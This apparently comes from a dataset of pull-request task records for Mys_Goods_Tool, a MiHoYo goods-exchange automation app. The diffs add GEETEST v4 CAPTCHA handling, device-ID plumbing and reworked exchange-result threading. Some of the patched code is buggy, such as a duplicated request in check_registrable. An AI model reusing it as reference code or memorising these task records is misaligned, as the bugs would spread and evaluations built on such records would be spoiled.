index c60ea3ca..7d2a48c4 100644
--- a/mys_goods_tool/api.py
+++ b/mys_goods_tool/api.py
@@ -3,13 +3,12 @@
import httpx
import tenacity
-from httpx import ConnectError
from pydantic import ValidationError, BaseModel
from requests.utils import dict_from_cookiejar
from mys_goods_tool.data_model import GameRecord, GameInfo, Good, Address, BaseApiStatus, MmtData, GeetestResult, \
GetCookieStatus, \
- CreateMobileCaptchaStatus, GetGoodDetailStatus, ExchangeStatus
+ CreateMobileCaptchaStatus, GetGoodDetailStatus, ExchangeStatus, GeetestResultV4
from mys_goods_tool.user_data import config as conf, UserAccount, BBSCookies, ExchangePlan, ExchangeResult
from mys_goods_tool.utils import generate_device_id, logger, generate_ds, Subscribe, \
NtpTime, get_async_retry
@@ -286,7 +285,7 @@ def wrong_captcha(self):
"""
是否返回验证码错误
"""
- return self.retcode == -201 or self.message in ["验证码错误", "Captcha not match Err"]
+ return self.retcode in [-201, -302] or self.message in ["验证码错误", "Captcha not match Err"]
@property
def login_expired(self):
@@ -631,86 +630,109 @@ async def get_address(account: UserAccount, retry: bool = True) -> Tuple[BaseApi
return BaseApiStatus(success=True), address_list
-async def check_registrable(phone_number: int, retry: bool = True) -> Tuple[BaseApiStatus, Optional[bool]]:
+async def check_registrable(phone_number: int, keep_client: bool = False, retry: bool = True) -> Tuple[
+ BaseApiStatus, Optional[bool], str, Optional[httpx.AsyncClient]]:
"""
检查用户是否可以注册
+ :param keep_client: httpx.AsyncClient 连接是否需要关闭
:param phone_number: 手机号
:param retry: 是否允许重试
+ :return: (API返回状态, 用户是否可以注册, 设备ID, httpx.AsyncClient连接对象)
"""
headers = HEADERS_WEBAPI.copy()
- headers["x-rpc-device_id"] = generate_device_id()
+ device_id = generate_device_id()
+ headers["x-rpc-device_id"] = device_id
+
+ async def request():
+ """
+ 发送请求的闭包函数
+ """
+ time_now = round(NtpTime.time() * 1000)
+ # await client.options(URL_REGISTRABLE.format(mobile=phone_number, t=time_now),
+ # headers=headers, timeout=conf.preference.timeout)
+ return await client.get(URL_REGISTRABLE.format(mobile=phone_number, t=time_now),
+ headers=headers, timeout=conf.preference.timeout)
+
try:
async for attempt in get_async_retry(retry):
with attempt:
- async with httpx.AsyncClient() as client:
- res = await client.get(URL_REGISTRABLE.format(mobile=phone_number, t=round(NtpTime.time() * 1000)),
- headers=headers, timeout=conf.preference.timeout)
- api_result = ApiResultHandler(res.json())
- return BaseApiStatus(success=True), bool(api_result.data["is_registable"])
+ if keep_client:
+ client = httpx.AsyncClient()
+ else:
+ async with httpx.AsyncClient() as client:
+ res = await request()
+ res = await request()
+ api_result = ApiResultHandler(res.json())
+ return BaseApiStatus(success=True), bool(api_result.data["is_registable"]), device_id, client
except tenacity.RetryError as e:
+ if keep_client:
+ await client.aclose()
if is_incorrect_return(e):
logger.exception(f"检查用户 {phone_number} 是否可以注册 - 服务器没有正确返回")
logger.debug(f"网络请求返回: {res.text}")
- return BaseApiStatus(incorrect_return=True), None
+ return BaseApiStatus(incorrect_return=True), None, device_id, client
else:
logger.exception(f"检查用户 {phone_number} 是否可以注册 - 请求失败")
- return BaseApiStatus(network_error=True), None
+ return BaseApiStatus(network_error=True), None, device_id, None
-async def create_mmt(keep_client: bool = False, retry: bool = True) -> Tuple[
- BaseApiStatus, Optional[MmtData], Optional[httpx.AsyncClient]]:
+async def create_mmt(client: Optional[httpx.AsyncClient] = None,
+ use_v4: bool = True,
+ device_id: str = generate_device_id(),
+ retry: bool = True) -> Tuple[
+ BaseApiStatus, Optional[MmtData], str, Optional[httpx.AsyncClient]]:
"""
发送短信验证前所需的人机验证任务申请
- :param keep_client: httpx.AsyncClient 连接是否需要关闭
+ :param client: httpx.AsyncClient 连接
+ :param use_v4: 是否使用极验第四代人机验证
+ :param device_id: 设备 ID
:param retry: 是否允许重试
+ :return: (API返回状态, 人机验证任务数据, 设备ID, httpx.AsyncClient连接对象)
"""
headers = HEADERS_WEBAPI.copy()
- headers["x-rpc-device_id"] = generate_device_id()
-
+ headers["x-rpc-device_id"] = device_id
+ if use_v4:
+ headers.setdefault("x-rpc-source", "accountWebsite")
async def request():
"""
发送请求的闭包函数
"""
time_now = round(NtpTime.time() * 1000)
- await client.options(URL_CREATE_MMT.format(now=time_now, t=time_now),
- headers=headers, timeout=conf.preference.timeout)
+ # await client.options(URL_CREATE_MMT.format(now=time_now, t=time_now),
+ # headers=headers, timeout=conf.preference.timeout)
return await client.get(URL_CREATE_MMT.format(now=time_now, t=time_now),
headers=headers, timeout=conf.preference.timeout)
try:
async for attempt in get_async_retry(retry):
with attempt:
- if keep_client:
- client = httpx.AsyncClient()
+ if client:
res = await request()
else:
async with httpx.AsyncClient() as client:
res = await request()
api_result = ApiResultHandler(res.json())
- return BaseApiStatus(success=True), MmtData.parse_obj(api_result.data["mmt_data"]), client
+ return BaseApiStatus(success=True), MmtData.parse_obj(api_result.data["mmt_data"]), device_id, client
except tenacity.RetryError as e:
- if keep_client:
+ if client:
await client.aclose()
if is_incorrect_return(e):
logger.exception(f"获取短信验证-人机验证任务(create_mmt) - 服务器没有正确返回")
logger.debug(f"网络请求返回: {res.text}")
- return BaseApiStatus(incorrect_return=True), None, client
+ return BaseApiStatus(incorrect_return=True), None, device_id, client
else:
logger.exception(f"获取短信验证-人机验证任务(create_mmt) - 请求失败")
- return BaseApiStatus(network_error=True), None, None
- except ConnectError:
- if keep_client:
- await client.aclose()
- logger.exception(f"获取短信验证-人机验证任务(create_mmt) - 网络连接失败")
- return BaseApiStatus(network_error=True), None, None
+ return BaseApiStatus(network_error=True), None, device_id, None
async def create_mobile_captcha(phone_number: int,
mmt_data: MmtData,
- geetest_result: GeetestResult,
+ geetest_result: Union[GeetestResult, GeetestResultV4],
client: Optional[httpx.AsyncClient] = None,
+ use_v4: bool = True,
+ device_id: str = generate_device_id(),
retry: bool = True
) -> Tuple[CreateMobileCaptchaStatus, Optional[httpx.AsyncClient]]:
"""
@@ -720,19 +742,30 @@ async def create_mobile_captcha(phone_number: int,
:param mmt_data: 人机验证任务数据
:param geetest_result: 人机验证结果数据
:param client: httpx.AsyncClient 连接
+ :param use_v4: 是否使用极验第四代人机验证
+ :param device_id: 设备 ID
:param retry: 是否允许重试
"""
headers = HEADERS_WEBAPI.copy()
- headers["x-rpc-device_id"] = generate_device_id()
- params = {
- "action_type": "login",
- "mmt_key": mmt_data.mmt_key,
- "geetest_challenge": mmt_data.challenge,
- "geetest_validate": geetest_result.validate,
- "geetest_seccode": geetest_result.seccode,
- "mobile": phone_number,
- "t": round(NtpTime.time() * 1000)
- }
+ headers["x-rpc-device_id"] = device_id
+ if use_v4 and isinstance(geetest_result, GeetestResultV4):
+ params = {
+ "action_type": "login",
+ "mmt_key": mmt_data.mmt_key,
+ "geetest_v4_data": geetest_result.dict(skip_defaults=True),
+ "mobile": phone_number,
+ "t": round(NtpTime.time() * 1000)
+ }
+ else:
+ params = {
+ "action_type": "login",
+ "mmt_key": mmt_data.mmt_key,
+ "geetest_challenge": mmt_data.challenge,
+ "geetest_validate": geetest_result.validate,
+ "geetest_seccode": geetest_result.seccode,
+ "mobile": phone_number,
+ "t": round(NtpTime.time() * 1000)
+ }
encoded_params = urlencode(params)
async def request():
@@ -752,7 +785,7 @@ async def request():
# headers=headers,
# timeout=conf.preference.timeout)
# cookies.update(res.cookies)
- if client is not None:
+ if client and not client.is_closed:
res = await request()
else:
async with httpx.AsyncClient() as client:
diff --git a/mys_goods_tool/data_model.py b/mys_goods_tool/data_model.py
index c33e7890..8e2e0160 100644
--- a/mys_goods_tool/data_model.py
+++ b/mys_goods_tool/data_model.py
@@ -287,10 +287,15 @@ class MmtData(BaseModel):
"""
短信验证码-人机验证任务申请-返回数据
"""
- challenge: str
+ challenge: Optional[str]
gt: str
mmt_key: str
new_captcha: bool
+ risk_type: Optional[str]
+ """任务类型,如滑动拼图 slide"""
+ success: Optional[int]
+ use_v4: Optional[bool]
+ """是否使用极验第四代 GT4"""
class BaseApiStatus(BaseModel):
@@ -374,3 +379,14 @@ class ExchangeStatus(BaseApiStatus):
GeetestResult = NamedTuple("GeetestResult", validate=str, seccode=str)
"""人机验证结果数据"""
+
+
+class GeetestResultV4(BaseModel):
+ """
+ GEETEST GT4 人机验证结果数据
+ """
+ captcha_id: str
+ lot_number: str
+ pass_token: str
+ gen_time: int
+ captcha_output: str
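The pydantic model added above carries the five fields of a GEETEST v4 result. A dependency-free sketch of the same shape with a stdlib dataclass (the `as_dict` helper is our stand-in for pydantic's `.dict()`):

```python
from dataclasses import dataclass, asdict


@dataclass
class GeetestResultV4:
    # GEETEST GT4 result fields, matching mys_goods_tool/data_model.py
    captcha_id: str
    lot_number: str
    pass_token: str
    gen_time: int
    captcha_output: str

    def as_dict(self):
        # stand-in for pydantic's .dict(skip_defaults=True)
        return asdict(self)
```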
diff --git a/mys_goods_tool/exchange_mode.py b/mys_goods_tool/exchange_mode.py
index 3fc31d67..f2f9b04e 100644
--- a/mys_goods_tool/exchange_mode.py
+++ b/mys_goods_tool/exchange_mode.py
@@ -122,36 +122,56 @@ def on_executed(event: JobExecutionEvent):
接收兑换结果
"""
if event.job_id.startswith("exchange-plan"):
+ thread_id = int(event.job_id.split('-')[-1])
result: Tuple[ExchangeStatus, Optional[ExchangeResult]] = event.retval
exchange_status, exchange_result = result
- plan = exchange_result.plan
-
- with lock:
- # 如果已经有一个线程兑换成功,就不再接收结果
- if True not in finished[plan]:
- thread_id = int(event.job_id.split('-')[-1])
- if exchange_result.result:
- finished[plan].append(True)
- logger.info(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换成功")
- else:
- finished[plan].append(False)
- logger.error(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换失败")
- if len(finished[plan]) == conf.preference.exchange_thread_count:
- try:
- conf.exchange_plans.remove(plan)
- except KeyError:
- pass
- else:
- conf.save()
+ if not exchange_status:
+ hash_value = int(event.job_id.split('-')[-2])
+ plan = filter(lambda x: x.__hash__() == hash_value, conf.exchange_plans)
+ plan = next(plan)
+ with lock:
+ finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换请求发送失败")
+ if len(finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
+
+ else:
+ plan = exchange_result.plan
+ with lock:
+ # 如果已经有一个线程兑换成功,就不再接收结果
+ if True not in finished[plan]:
+ if exchange_result.result:
+ finished[plan].append(True)
+ logger.info(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换成功")
+ else:
+ finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换失败")
+
+ if len(finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
elif event.job_id == "exchange-connection_test":
result: Union[float, bool, None] = event.retval
@@ -277,41 +297,62 @@ def on_executed(cls, event: JobExecutionEvent):
if event.job_id.startswith("exchange-plan"):
result: Tuple[ExchangeStatus, Optional[ExchangeResult]] = event.retval
exchange_status, exchange_result = result
- plan = exchange_result.plan
-
- with cls.lock:
- # 如果已经有一个线程兑换成功,就不再接收结果
- if True not in cls.finished[plan]:
- row = ExchangeResultRow.rows[plan]
- thread_id = int(event.job_id.split('-')[-1])
-
- if exchange_result.result:
- cls.finished[plan].append(True)
- logger.info(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换成功")
- text = f"[bold green]🎉 线程 {thread_id} - 兑换成功[/] "
- else:
- cls.finished[plan].append(False)
- logger.error(
- f"用户 {plan.account.bbs_uid}"
- f" - {plan.good.general_name}"
- f" - 线程 {thread_id}"
- f" - 兑换失败")
- text = f"[bold red]💦 线程 {thread_id} - 兑换失败[/] "
-
+ thread_id = int(event.job_id.split('-')[-1])
+ if not exchange_status:
+ hash_value = int(event.job_id.split('-')[-2])
+ plan = filter(lambda x: x.__hash__() == hash_value, conf.exchange_plans)
+ plan = next(plan)
+ row = ExchangeResultRow.rows[plan]
+ with cls.lock:
+ cls.finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换失败")
+ text = f"[bold red]💦 线程 {thread_id} - 兑换请求失败[/] "
row.result_preview._add_children(ExchangeResultRow.get_result_static(text))
row.result_preview.refresh()
-
- if len(cls.finished[plan]) == conf.preference.exchange_thread_count:
- try:
- conf.exchange_plans.remove(plan)
- except KeyError:
- pass
- else:
- conf.save()
+ if len(cls.finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
+ else:
+ plan = exchange_result.plan
+ with cls.lock:
+ # 如果已经有一个线程兑换成功,就不再接收结果
+ if True not in cls.finished[plan]:
+ row = ExchangeResultRow.rows[plan]
+ if exchange_result.result:
+ cls.finished[plan].append(True)
+ logger.info(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换成功")
+ text = f"[bold green]🎉 线程 {thread_id} - 兑换成功[/] "
+ else:
+ cls.finished[plan].append(False)
+ logger.error(
+ f"用户 {plan.account.bbs_uid}"
+ f" - {plan.good.general_name}"
+ f" - 线程 {thread_id}"
+ f" - 兑换失败")
+ text = f"[bold red]💦 线程 {thread_id} - 兑换失败[/] "
+
+ row.result_preview._add_children(ExchangeResultRow.get_result_static(text))
+ row.result_preview.refresh()
+
+ if len(cls.finished[plan]) == conf.preference.exchange_thread_count:
+ try:
+ conf.exchange_plans.remove(plan)
+ except KeyError:
+ pass
+ else:
+ conf.save()
except:
logger.exception("接收兑换结果失败")
diff --git a/mys_goods_tool/login_view.py b/mys_goods_tool/login_view.py
index 7d64a487..4cd8ce2a 100644
--- a/mys_goods_tool/login_view.py
+++ b/mys_goods_tool/login_view.py
@@ -3,6 +3,7 @@
import asyncio
import queue
from typing import NamedTuple, Tuple, Optional, Set
+from urllib.parse import urlencode
import httpx
from rich.markdown import Markdown
@@ -12,7 +13,8 @@
)
from mys_goods_tool.api import create_mobile_captcha, create_mmt, get_login_ticket_by_captcha, \
- get_multi_token_by_login_ticket, get_cookie_token_by_stoken, get_stoken_v2_by_v1, get_ltoken_by_stoken
+ get_multi_token_by_login_ticket, get_cookie_token_by_stoken, get_stoken_v2_by_v1, get_ltoken_by_stoken, \
+ check_registrable
from mys_goods_tool.custom_css import *
from mys_goods_tool.custom_widget import RadioStatus, StaticStatus, ControllableButton, LoadingDisplay
from mys_goods_tool.data_model import GeetestResult, MmtData, GetCookieStatus
@@ -106,6 +108,8 @@ class PhoneForm(LoginForm):
"""
input = Input(placeholder="手机号", id="login_phone")
"""手机号输入框"""
+ device_id: Optional[str] = None
+ """人机验证过程的设备ID"""
client: Optional[httpx.AsyncClient] = None
"""人机验证过程的连接对象"""
@@ -181,13 +185,14 @@ async def listen_result(self):
except queue.Empty:
continue
else:
- logger.info(f"已收到Geetest验证结果数据 {geetest_result},将发送验证码至 {self.input.value}")
+ logger.info(f"已收到Geetest验证结果数据,将发送验证码至 {self.input.value}")
CaptchaLoginInformation.radio_tuple.geetest_finished.turn_on()
self.loading.show()
create_captcha_status, PhoneForm.client = await create_mobile_captcha(int(self.input.value),
self.mmt_data,
geetest_result,
- PhoneForm.client)
+ PhoneForm.client,
+ device_id=PhoneForm.device_id)
if create_captcha_status:
self.loading.hide()
logger.info(f"短信验证码已发送至 {self.input.value}")
@@ -232,8 +237,14 @@ def set_address_callback(self, address: Tuple[str, int]):
self.loop_tasks.add(task)
task.add_done_callback(self.loop_tasks.discard)
- link = f"http://{address[0]}:{address[1]}/index.html?gt={self.mmt_data.gt}&challenge={self.mmt_data.challenge}"
- link_localized = f"http://{address[0]}:{address[1]}/localized.html?gt={self.mmt_data.gt}&challenge={self.mmt_data.challenge}"
+ params = {
+ "gt": self.mmt_data.gt,
+ "mmtKey": self.mmt_data.mmt_key,
+ "riskType": self.mmt_data.risk_type
+ }
+ url_params = urlencode(params)
+ link = f"http://{address[0]}:{address[1]}/index.html?{url_params}"
+ link_localized = f"http://{address[0]}:{address[1]}/localized.html?{url_params}"
CaptchaLoginInformation.static_tuple.geetest_text.change_text(
renderable=f"\n- 请前往链接进行验证:\n"
f"[@click=app.open_link('{link}')]{link}[/]\n"
@@ -271,7 +282,15 @@ async def create_captcha(self):
if PhoneForm.client:
await PhoneForm.client.aclose()
- create_mmt_status, self.mmt_data, PhoneForm.client = await create_mmt(keep_client=True)
+ check_registrable_status, registrable, PhoneForm.device_id, PhoneForm.client = await check_registrable(
+ int(self.input.value))
+ if registrable:
+ self.close_create_captcha_send()
+ self.button.error.show()
+ self.app.notice("[red]该手机号尚未注册![/]")
+ return
+ create_mmt_status, self.mmt_data, PhoneForm.device_id, PhoneForm.client = await create_mmt(PhoneForm.client,
+ device_id=PhoneForm.device_id)
if not create_mmt_status:
self.close_create_captcha_send()
self.button.error.show()
@@ -330,7 +349,7 @@ def __init__(self):
self.before_login: bool = True
"""当前状态是否在登录操作之前(不处于正在登录的状态)"""
- self.input = Input(placeholder="为空时点击登录可进行Cookies刷新", id="login_captcha")
+ self.input = Input(placeholder="若发送验证码失败,也可前往米哈游通信证页面手动发送", id="login_captcha")
self.loading = LoadingDisplay()
self.loading.hide()
diff --git a/mys_goods_tool/tui.py b/mys_goods_tool/tui.py
index 683f0554..90f798c1 100644
--- a/mys_goods_tool/tui.py
+++ b/mys_goods_tool/tui.py
@@ -31,10 +31,9 @@
# Mys_Goods_Tool - 米游社商品兑换工具
## 更新说明
-- 修复米游社(大别野)等商品分区无商品的问题
-- 修复图形界面兑换模式下不会执行兑换的问题
-- 删除多余的 `pyperclip` 依赖
-- 解决部分商品兑换时间错误的问题
+- 修复启动后由于商品数据相关问题而导致的崩溃
+- 修复 Linux 实际不会应用 uvloop 的问题
+- 人机验证更新至 GT4(但实际上暂时不可用 [#105](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues/105#issuecomment-1552727784))
## 功能和特性
@@ -45,9 +44,6 @@
- 支持米游社所有分区的商品兑换
### TODO
-- 支持在图形界面中编辑偏好设置
-- 密码登录
-- 解决SSH客户端无法跳转人机验证链接的问题
- 更新至极验第四代适应性验证
## 其他
@@ -406,7 +402,7 @@ def _on_mount(self, _: events.Mount) -> None:
TuiApp.text_log_writer = TuiApp.TextLogWriter()
logger.add(self.text_log_writer, diagnose=False, level="DEBUG", format=LOG_FORMAT)
if sys.platform not in ('win32', 'cygwin', 'cli'):
- if "uvloop" not in sys.modules.copy():
+ if "uvloop" in sys.modules.copy():
import uvloop
import asyncio
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
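The one-character fix above (`not in` → `in`) only takes effect when `uvloop` is already importable; it does not cover the case where the package is missing entirely. A defensive sketch that handles both (the helper name is ours):

```python
import asyncio
import sys


def install_uvloop_if_available() -> bool:
    """Switch to uvloop's event loop policy on POSIX when the package exists."""
    if sys.platform in ("win32", "cygwin", "cli"):
        return False  # uvloop does not support Windows
    try:
        import uvloop  # optional speedup; may be absent on some installs
    except ImportError:
        return False
    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
    return True
```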
diff --git a/mys_goods_tool/user_data.py b/mys_goods_tool/user_data.py
index 4022c5de..9cd0f8e3 100644
--- a/mys_goods_tool/user_data.py
+++ b/mys_goods_tool/user_data.py
@@ -412,7 +412,7 @@ class UserData(BaseModel):
用户数据类
"""
version: str = VERSION
- """本次修改用户数据文件的程序版本号"""
+ """创建用户数据文件的程序版本号"""
exchange_plans: Union[Set[ExchangePlan], List[ExchangePlan]] = set()
"""兑换计划列表"""
preference: Preference = Preference()
| Error when running on Debian: No module named 'uvloop'

After completing the CAPTCHA, the process gets stuck at the "send verification code" step.

Follow-up: updated to GEETEST v4 behavioral verification.
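The `create_mobile_captcha` change in the patch above branches between GT3 and GT4 payloads before URL-encoding them. A simplified stdlib sketch of that branching (function and argument names are ours; in the real code the GT3 `challenge` comes from `mmt_data`, here it travels in the same dict for brevity):

```python
from urllib.parse import urlencode


def build_captcha_params(mmt_key, geetest, mobile, t, use_v4=True):
    # GT4 sends the whole verification result as one value;
    # GT3 sends challenge/validate/seccode as separate query fields.
    if use_v4:
        params = {"action_type": "login", "mmt_key": mmt_key,
                  "geetest_v4_data": geetest, "mobile": mobile, "t": t}
    else:
        params = {"action_type": "login", "mmt_key": mmt_key,
                  "geetest_challenge": geetest["challenge"],
                  "geetest_validate": geetest["validate"],
                  "geetest_seccode": geetest["seccode"],
                  "mobile": mobile, "t": t}
    return urlencode(params)
```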
| 2023-05-26T18:44:49 | 0.0 | [] | [] |
|||
Ljzd-PRO/Mys_Goods_Tool | Ljzd-PRO__Mys_Goods_Tool-96 | 3a0b525770f89208093435d4505340b5380b6746 | diff --git a/README.md b/README.md
index 519c9efb..afb9f70e 100644
--- a/README.md
+++ b/README.md
@@ -16,7 +16,9 @@
### 更新说明
-v2.0.0 开始的包含了图形化的小工具是基本上重做了,所以刚发布这段时间测试可能不太够,可能不太稳定。
+- 修复米游社(大别野)等商品分区无商品的问题
+- 修复图形界面兑换模式下不会执行兑换的问题
+- 删除多余的 `pyperclip` 依赖
## 功能和特性
diff --git a/mys_goods_tool/api.py b/mys_goods_tool/api.py
index 8550295a..c0a84308 100644
--- a/mys_goods_tool/api.py
+++ b/mys_goods_tool/api.py
@@ -533,12 +533,40 @@ async def get_good_detail(good_id: str, retry: bool = True) -> Tuple[GetGoodDeta
GetGoodDetailStatus(network_error=True), None
-async def get_good_list(game: str, retry: bool = True) -> Tuple[
+async def get_good_games(retry: bool = True) -> Tuple[BaseApiStatus, Optional[List[Tuple[str, str]]]]:
+ """
+ 获取商品分区列表
+
+ :param retry: 是否允许重试
+ :return: (商品分区全名, 字母简称) 的列表
+ """
+ try:
+ async for attempt in tenacity.AsyncRetrying(stop=custom_attempt_times(retry), reraise=True,
+ wait=tenacity.wait_fixed(conf.preference.retry_interval)):
+ with attempt:
+ async with httpx.AsyncClient() as client:
+ res = await client.get(URL_GOOD_LIST.format(page=1,
+ game=""),
+ headers=HEADERS_GOOD_LIST,
+ timeout=conf.preference.timeout)
+ api_result = ApiResultHandler(res.json())
+ return BaseApiStatus(success=True), list(map(lambda x: (x["name"], x["key"]), api_result.data["games"]))
+ except tenacity.RetryError as e:
+ if is_incorrect_return(e):
+ logger.exception(f"米游币商品兑换 - 获取商品列表: 服务器没有正确返回")
+ logger.debug(f"网络请求返回: {res.text}")
+ return BaseApiStatus(incorrect_return=True), None
+ else:
+ logger.exception(f"米游币商品兑换 - 获取商品列表: 网络请求失败")
+ return BaseApiStatus(network_error=True), None
+
+
+async def get_good_list(game: str = "", retry: bool = True) -> Tuple[
BaseApiStatus, Optional[List[Good]]]:
"""
获取商品信息列表
- :param game: 游戏简称
+ :param game: 游戏简称(默认为空,即获取所有游戏的商品)
:param retry: 是否允许重试
:return: 商品信息列表
"""
diff --git a/mys_goods_tool/custom_css.py b/mys_goods_tool/custom_css.py
index 6d0ce74d..ac149816 100644
--- a/mys_goods_tool/custom_css.py
+++ b/mys_goods_tool/custom_css.py
@@ -123,7 +123,7 @@ class AboveFold(Container):
DEFAULT_CSS = """
AboveFold {
width: 100%;
- height: 100%;
+ height: auto;
align: center middle;
}
"""
@@ -265,3 +265,52 @@ class ExchangePlanContent(Container):
height: 3;
}
"""
+
+
+class CaptchaTips(Container):
+ """
+ 登陆信息面板文本视图
+ """
+ DEFAULT_CSS = """
+ CaptchaTips {
+ height: 100%;
+ width: 1fr;
+ align: right middle;
+ padding: 1;
+ overflow: auto;
+ border: round #666;
+ }
+
+ App.-light-mode Tips {
+ border: round #CCC;
+ }
+
+ CaptchaTips StaticStatus {
+ width: 100%;
+ align: center top;
+ text-align: center;
+ }
+ """
+
+
+class CaptchaStepSet(Container):
+ """
+ 登陆进度节点集合视图
+ """
+ DEFAULT_CSS = """
+ CaptchaStepSet {
+ height: auto;
+ width: 1fr;
+ align: left middle;
+ overflow: auto;
+ border: round #666;
+ }
+
+ App.-light-mode StepSet {
+ border: round #CCC;
+ }
+
+ CaptchaStepSet RadioStatus {
+ margin: 1 1;
+ }
+ """
diff --git a/mys_goods_tool/custom_widget.py b/mys_goods_tool/custom_widget.py
index f3de9894..d2e77bec 100644
--- a/mys_goods_tool/custom_widget.py
+++ b/mys_goods_tool/custom_widget.py
@@ -1,7 +1,7 @@
from __future__ import annotations
from itertools import zip_longest
-from typing import Optional
+from typing import Optional, Tuple
from rich.console import RenderableType
from rich.text import TextType
@@ -16,7 +16,6 @@
from textual.widgets._tabbed_content import ContentTab
from mys_goods_tool.custom_css import *
-from mys_goods_tool.data_model import GameInfo
from mys_goods_tool.user_data import ExchangePlan
@@ -217,10 +216,10 @@ def __init__(
id: str | None = None,
classes: str | None = None,
disabled: bool = False,
- game: GameInfo
+ partition: Tuple[str, str]
):
super().__init__(label, variant, name=name, id=id, classes=classes, disabled=disabled)
- self.game = game
+ self.partition = partition
class Pressed(Button.Pressed):
def __init__(self, button: GameButton):
diff --git a/mys_goods_tool/exchange_mode.py b/mys_goods_tool/exchange_mode.py
index 1be76fc7..72f84d6d 100644
--- a/mys_goods_tool/exchange_mode.py
+++ b/mys_goods_tool/exchange_mode.py
@@ -7,8 +7,9 @@
import ping3
from apscheduler.events import JobExecutionEvent, EVENT_JOB_EXECUTED
-from apscheduler.schedulers.asyncio import AsyncIOScheduler
-from apscheduler.schedulers.base import STATE_STOPPED
+from apscheduler.schedulers.background import BackgroundScheduler
+from apscheduler.schedulers.base import STATE_STOPPED, BaseScheduler
+from apscheduler.schedulers.blocking import BlockingScheduler
from rich.console import RenderableType
from textual import events
from textual.app import ComposeResult
@@ -51,11 +52,10 @@ def _connection_test():
return result
-def get_scheduler():
+def set_scheduler(scheduler: BaseScheduler):
"""
- 获取兑换计划调度器
+ 向兑换计划调度器添加兑换任务以及ping循环
"""
- scheduler = AsyncIOScheduler()
scheduler.configure(timezone=conf.preference.timezone or Preference.timezone)
if conf.preference.enable_connection_test:
@@ -99,7 +99,7 @@ def exchange_mode_simple():
logger.info("无兑换计划需要执行")
return
- scheduler = get_scheduler()
+ scheduler = set_scheduler(BlockingScheduler())
finished_plans = set()
@lambda func: scheduler.add_listener(func, EVENT_JOB_EXECUTED)
@@ -138,12 +138,12 @@ def on_executed(event: JobExecutionEvent):
f"Ping 商品兑换API服务器 {_get_api_host() or 'N/A'} - 延迟 {round(result, 2) if result else 'N/A'} ms")
try:
+ logger.info("启动兑换计划定时器")
scheduler.start()
- logger.info("兑换计划定时器已启动")
- asyncio.get_event_loop().run_forever()
+
except KeyboardInterrupt:
+ logger.info("停止兑换计划定时器")
scheduler.shutdown()
- logger.info("兑换计划定时器已停止")
class EnterExchangeMode(Event):
@@ -212,7 +212,7 @@ class ExchangeModeView(Container):
button_exit.hide()
warning_text = ExchangeModeWarning()
"""进入/退出 兑换模式的提示文本"""
- scheduler = get_scheduler()
+ scheduler = set_scheduler(BackgroundScheduler())
"""兑换计划调度器"""
empty_data_item = ListItem(Static("暂无兑换计划,你可以尝试刷新"))
list_view = ListView(empty_data_item)
@@ -372,7 +372,6 @@ class ExchangeModePing(Static):
"""
DEFAULT_VALUE = False
ping_value: reactive[Union[float, bool, None]] = reactive(DEFAULT_VALUE)
- scheduler = get_scheduler()
def render(self) -> RenderableType:
return f"⚡ Ping | 商品兑换API服务器 [yellow]{_get_api_host() or 'N/A'}[/]" \
diff --git a/mys_goods_tool/exchange_plan_view.py b/mys_goods_tool/exchange_plan_view.py
index 990889ef..ed3d42a6 100644
--- a/mys_goods_tool/exchange_plan_view.py
+++ b/mys_goods_tool/exchange_plan_view.py
@@ -14,12 +14,12 @@
)
from textual.widgets._option_list import Option, Separator
-from mys_goods_tool.api import get_good_list, get_game_list, get_address, get_game_record, good_exchange, \
- get_good_detail
+from mys_goods_tool.api import get_good_list, get_address, get_game_record, good_exchange, \
+ get_good_detail, get_good_games
from mys_goods_tool.custom_css import *
from mys_goods_tool.custom_widget import StaticStatus, ControllableButton, LoadingDisplay, \
DynamicTabbedContent, GameButton, PlanButton, UnClickableItem
-from mys_goods_tool.data_model import Good, GameInfo, Address, GameRecord
+from mys_goods_tool.data_model import Good, Address, GameRecord
from mys_goods_tool.user_data import config as conf, UserAccount, ExchangePlan
_T = TypeVar("_T")
@@ -242,10 +242,10 @@ class GoodsContent(BaseExchangePlan):
loading = LoadingDisplay()
loading.hide()
- good_dict: Dict[int, GoodsDictValue] = {}
- """获取到的商品数据以及相关的控件"""
- selected_tuple: Optional[Tuple[GameInfo, int]] = None
- """已选择的商品位置"""
+ good_dict: Dict[str, GoodsDictValue] = {}
+ """获取到的商品数据以及相关的控件 商品分区简称 -> 商品数据"""
+ selected_tuple: Optional[Tuple[Tuple[str, str], int]] = None
+ """已选择的商品位置 ((商品分区, 分区简称), 商品在OptionList中的位置)"""
empty_data_option = Option("暂无商品数据,可能是目前没有限时兑换的商品,可尝试刷新", disabled=True)
"""空的商品选项列表"""
@@ -257,28 +257,29 @@ class GoodsDictValue:
"""
def __init__(self,
- game_info: GameInfo,
+ partition: Tuple[str, str],
button_select: Optional[GameButton] = None,
tap_pane: Optional[TabPane] = None,
good_list: List[Good] = None,
